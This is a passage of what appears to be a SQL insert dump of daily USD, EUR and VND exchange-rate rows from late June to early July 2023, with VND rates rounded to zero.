(5937, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-26'),
(5938, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5939, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-26'),
(5940, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-26'),
(5941, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-26'),
(5942, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5943, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-26'),
(5944, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5945, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-26'),
(5946, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-26'),
(5947, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-26'),
(5948, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5949, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-26'),
(5950, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5951, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-26'),
(5952, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-26'),
(5953, 1, 'USD', 0.000000, 2, 'EUR', 0.918780, '2023-06-26'),
(5954, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5955, 2, 'EUR', 0.000000, 1, 'USD', 1.088400, '2023-06-26'),
(5956, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-26'),
(5957, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-26'),
(5958, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-26'),
(5959, 1, 'USD', 1.000000, 2, 'EUR', 0.918780, '2023-06-27'),
(5960, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5961, 2, 'EUR', 1.000000, 1, 'USD', 1.088400, '2023-06-27'),
(5962, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5963, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-27'),
(5964, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-27'),
(5965, 1, 'USD', 0.000000, 2, 'EUR', 0.915920, '2023-06-27'),
(5966, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5967, 2, 'EUR', 0.000000, 1, 'USD', 1.091800, '2023-06-27'),
(5968, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5969, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-27'),
(5970, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-27'),
(5971, 1, 'USD', 1.000000, 2, 'EUR', 0.915920, '2023-06-27'),
(5972, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5973, 2, 'EUR', 1.000000, 1, 'USD', 1.091800, '2023-06-27'),
(5974, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5975, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-27'),
(5976, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-27'),
(5977, 1, 'USD', 0.000000, 2, 'EUR', 0.915920, '2023-06-27'),
(5978, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5979, 2, 'EUR', 0.000000, 1, 'USD', 1.091800, '2023-06-27'),
(5980, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5981, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-27'),
(5982, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-27'),
(5983, 1, 'USD', 1.000000, 2, 'EUR', 0.915920, '2023-06-27'),
(5984, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5985, 2, 'EUR', 1.000000, 1, 'USD', 1.091800, '2023-06-27'),
(5986, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5987, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-27'),
(5988, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-27'),
(5989, 1, 'USD', 0.000000, 2, 'EUR', 0.915920, '2023-06-27'),
(5990, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5991, 2, 'EUR', 0.000000, 1, 'USD', 1.091800, '2023-06-27'),
(5992, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5993, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-27'),
(5994, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-27'),
(5995, 1, 'USD', 1.000000, 2, 'EUR', 0.915920, '2023-06-27'),
(5996, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5997, 2, 'EUR', 1.000000, 1, 'USD', 1.091800, '2023-06-27'),
(5998, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-27'),
(5999, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-27'),
(6000, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-27'),
(6001, 1, 'USD', 0.000000, 2, 'EUR', 0.915920, '2023-06-27'),
(6002, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-27'),
(6003, 2, 'EUR', 0.000000, 1, 'USD', 1.091800, '2023-06-27'),
(6004, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-27'),
(6005, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-27'),
(6006, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-27'),
(6007, 1, 'USD', 1.000000, 2, 'EUR', 0.915920, '2023-06-28'),
(6008, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6009, 2, 'EUR', 1.000000, 1, 'USD', 1.091800, '2023-06-28'),
(6010, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6011, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-28'),
(6012, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-28'),
(6013, 1, 'USD', 0.000000, 2, 'EUR', 0.913160, '2023-06-28'),
(6014, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6015, 2, 'EUR', 0.000000, 1, 'USD', 1.095100, '2023-06-28'),
(6016, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6017, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-28'),
(6018, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-28'),
(6019, 1, 'USD', 1.000000, 2, 'EUR', 0.913160, '2023-06-28'),
(6020, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6021, 2, 'EUR', 1.000000, 1, 'USD', 1.095100, '2023-06-28'),
(6022, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6023, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-28'),
(6024, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-28'),
(6025, 1, 'USD', 0.000000, 2, 'EUR', 0.913160, '2023-06-28'),
(6026, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6027, 2, 'EUR', 0.000000, 1, 'USD', 1.095100, '2023-06-28'),
(6028, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6029, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-28'),
(6030, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-28'),
(6031, 1, 'USD', 1.000000, 2, 'EUR', 0.913160, '2023-06-28'),
(6032, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6033, 2, 'EUR', 1.000000, 1, 'USD', 1.095100, '2023-06-28'),
(6034, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6035, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-28'),
(6036, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-28'),
(6037, 1, 'USD', 0.000000, 2, 'EUR', 0.913160, '2023-06-28'),
(6038, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6039, 2, 'EUR', 0.000000, 1, 'USD', 1.095100, '2023-06-28'),
(6040, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6041, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-28'),
(6042, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-28'),
(6043, 1, 'USD', 1.000000, 2, 'EUR', 0.913160, '2023-06-28'),
(6044, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6045, 2, 'EUR', 1.000000, 1, 'USD', 1.095100, '2023-06-28'),
(6046, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6047, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-28'),
(6048, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-28'),
(6049, 1, 'USD', 0.000000, 2, 'EUR', 0.913160, '2023-06-28'),
(6050, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6051, 2, 'EUR', 0.000000, 1, 'USD', 1.095100, '2023-06-28'),
(6052, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-28'),
(6053, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-28'),
(6054, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-28'),
(6055, 1, 'USD', 1.000000, 2, 'EUR', 0.913160, '2023-06-29'),
(6056, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6057, 2, 'EUR', 1.000000, 1, 'USD', 1.095100, '2023-06-29'),
(6058, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6059, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-29'),
(6060, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-29'),
(6061, 1, 'USD', 0.000000, 2, 'EUR', 0.914240, '2023-06-29'),
(6062, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6063, 2, 'EUR', 0.000000, 1, 'USD', 1.093800, '2023-06-29'),
(6064, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6065, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-29'),
(6066, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-29'),
(6067, 1, 'USD', 1.000000, 2, 'EUR', 0.914240, '2023-06-29'),
(6068, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6069, 2, 'EUR', 1.000000, 1, 'USD', 1.093800, '2023-06-29'),
(6070, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6071, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-29'),
(6072, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-29'),
(6073, 1, 'USD', 0.000000, 2, 'EUR', 0.914240, '2023-06-29'),
(6074, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6075, 2, 'EUR', 0.000000, 1, 'USD', 1.093800, '2023-06-29'),
(6076, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6077, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-29'),
(6078, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-29'),
(6079, 1, 'USD', 1.000000, 2, 'EUR', 0.914240, '2023-06-29'),
(6080, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6081, 2, 'EUR', 1.000000, 1, 'USD', 1.093800, '2023-06-29'),
(6082, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6083, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-29'),
(6084, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-29'),
(6085, 1, 'USD', 0.000000, 2, 'EUR', 0.914240, '2023-06-29'),
(6086, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6087, 2, 'EUR', 0.000000, 1, 'USD', 1.093800, '2023-06-29'),
(6088, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6089, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-29'),
(6090, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-29'),
(6091, 1, 'USD', 1.000000, 2, 'EUR', 0.914240, '2023-06-29'),
(6092, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6093, 2, 'EUR', 1.000000, 1, 'USD', 1.093800, '2023-06-29'),
(6094, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6095, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-29'),
(6096, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-29'),
(6097, 1, 'USD', 0.000000, 2, 'EUR', 0.914240, '2023-06-29'),
(6098, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6099, 2, 'EUR', 0.000000, 1, 'USD', 1.093800, '2023-06-29'),
(6100, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-29'),
(6101, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-29'),
(6102, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-29'),
(6103, 1, 'USD', 1.000000, 2, 'EUR', 0.914240, '2023-06-30'),
(6104, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6105, 2, 'EUR', 1.000000, 1, 'USD', 1.093800, '2023-06-30'),
(6106, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6107, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-30'),
(6108, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-30'),
(6109, 1, 'USD', 0.000000, 2, 'EUR', 0.914240, '2023-06-30'),
(6110, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6111, 2, 'EUR', 0.000000, 1, 'USD', 1.093800, '2023-06-30'),
(6112, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6113, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-30'),
(6114, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-30'),
(6115, 1, 'USD', 1.000000, 2, 'EUR', 0.914240, '2023-06-30'),
(6116, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6117, 2, 'EUR', 1.000000, 1, 'USD', 1.093800, '2023-06-30'),
(6118, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6119, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-30'),
(6120, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-30'),
(6121, 1, 'USD', 0.000000, 2, 'EUR', 0.914240, '2023-06-30'),
(6122, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6123, 2, 'EUR', 0.000000, 1, 'USD', 1.093800, '2023-06-30'),
(6124, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6125, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-30'),
(6126, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-30'),
(6127, 1, 'USD', 1.000000, 2, 'EUR', 0.914240, '2023-06-30'),
(6128, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6129, 2, 'EUR', 1.000000, 1, 'USD', 1.093800, '2023-06-30'),
(6130, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6131, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-30'),
(6132, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-30'),
(6133, 1, 'USD', 0.000000, 2, 'EUR', 0.914240, '2023-06-30'),
(6134, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6135, 2, 'EUR', 0.000000, 1, 'USD', 1.093800, '2023-06-30'),
(6136, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6137, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-30'),
(6138, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-30'),
(6139, 1, 'USD', 1.000000, 2, 'EUR', 0.914240, '2023-06-30'),
(6140, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6141, 2, 'EUR', 1.000000, 1, 'USD', 1.093800, '2023-06-30'),
(6142, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6143, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-30'),
(6144, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-30'),
(6145, 1, 'USD', 0.000000, 2, 'EUR', 0.914240, '2023-06-30'),
(6146, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6147, 2, 'EUR', 0.000000, 1, 'USD', 1.093800, '2023-06-30'),
(6148, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-30'),
(6149, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-30'),
(6150, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-30'),
(6151, 1, 'USD', 1.000000, 2, 'EUR', 0.914240, '2023-07-01'),
(6152, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6153, 2, 'EUR', 1.000000, 1, 'USD', 1.093800, '2023-07-01'),
(6154, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6155, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-01'),
(6156, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-01'),
(6157, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-01'),
(6158, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6159, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-01'),
(6160, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6161, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-01'),
(6162, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-01'),
(6163, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-01'),
(6164, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6165, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-01'),
(6166, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6167, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-01'),
(6168, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-01'),
(6169, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-01'),
(6170, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6171, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-01'),
(6172, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6173, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-01'),
(6174, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-01'),
(6175, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-01'),
(6176, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6177, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-01'),
(6178, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6179, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-01'),
(6180, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-01'),
(6181, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-01'),
(6182, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6183, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-01'),
(6184, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6185, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-01'),
(6186, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-01'),
(6187, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-01'),
(6188, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6189, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-01'),
(6190, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6191, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-01'),
(6192, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-01'),
(6193, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-01'),
(6194, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6195, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-01'),
(6196, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-01'),
(6197, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-01'),
(6198, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-01'),
(6199, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-02'),
(6200, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6201, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-02'),
(6202, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6203, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-02'),
(6204, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-02'),
(6205, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-02'),
(6206, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6207, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-02'),
(6208, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6209, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-02'),
(6210, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-02'),
(6211, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-02'),
(6212, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6213, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-02'),
(6214, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6215, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-02'),
(6216, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-02'),
(6217, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-02'),
(6218, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6219, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-02'),
(6220, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6221, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-02'),
(6222, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-02'),
(6223, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-02'),
(6224, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6225, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-02'),
(6226, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6227, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-02'),
(6228, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-02'),
(6229, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-02'),
(6230, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6231, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-02'),
(6232, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6233, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-02'),
(6234, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-02'),
(6235, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-02'),
(6236, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6237, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-02'),
(6238, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6239, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-02'),
(6240, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-02'),
(6241, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-02'),
(6242, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6243, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-02'),
(6244, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-02'),
(6245, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-02'),
(6246, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-02'),
(6247, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-03'),
(6248, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6249, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-03'),
(6250, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6251, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-03'),
(6252, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-03'),
(6253, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-03'),
(6254, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6255, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-03'),
(6256, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6257, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-03'),
(6258, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-03'),
(6259, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-03'),
(6260, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6261, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-03'),
(6262, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6263, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-03'),
(6264, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-03'),
(6265, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-03'),
(6266, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6267, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-03'),
(6268, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6269, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-03'),
(6270, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-03'),
(6271, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-03'),
(6272, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6273, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-03'),
(6274, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6275, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-03'),
(6276, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-07-03'),
(6277, 1, 'USD', 0.000000, 2, 'EUR', 0.920300, '2023-07-03'),
(6278, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6279, 2, 'EUR', 0.000000, 1, 'USD', 1.086600, '2023-07-03'),
(6280, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6281, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-07-03'),
(6282, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-07-03'),
(6283, 1, 'USD', 1.000000, 2, 'EUR', 0.920300, '2023-07-03'),
(6284, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6285, 2, 'EUR', 1.000000, 1, 'USD', 1.086600, '2023-07-03'),
(6286, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-07-03'),
(6287, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-07-03'),
